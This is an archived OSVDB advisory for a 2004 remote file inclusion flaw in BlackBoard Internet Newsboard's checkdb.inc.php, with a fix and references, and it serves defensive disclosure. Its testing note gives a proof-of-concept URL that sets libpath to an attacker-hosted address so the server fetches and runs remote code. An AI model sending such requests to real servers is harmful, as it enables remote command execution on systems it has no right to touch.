Yves Goergen BlackBoard Internet Newsboard System checkdb.inc.php Arbitrary Command Execution

2004-10-06T00:00:00
ID OSVDB:10538
Type osvdb
Reporter Lin Xiaofeng(cracklove@gmail.com)
Modified 2004-10-06T00:00:00

Description

Vulnerability Description

Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue is triggered when "checkdb.inc.php" does not validate user supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server which contains commands that will be executed with the same privileges as the running web server.

Solution Description

Upgrade to version 1.5.1h or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue is triggered when "checkdb.inc.php" does not validate user supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server which contains commands that will be executed with the same privileges as the running web server.

Manual Testing Notes

http://[victim]/bb_lib/checkdb.inc.php?libpath=http://[attacker]/

References:

Vendor URL: http://blackboard.unclassified.de/download.php Security Tracker: 1011551 Secunia Advisory ID:12757 Other Advisory URL: http://blackboard.unclassified.de/70,1#1031 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0044.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-10/0057.html Keyword: Remote File Inclusion CVE-2004-1582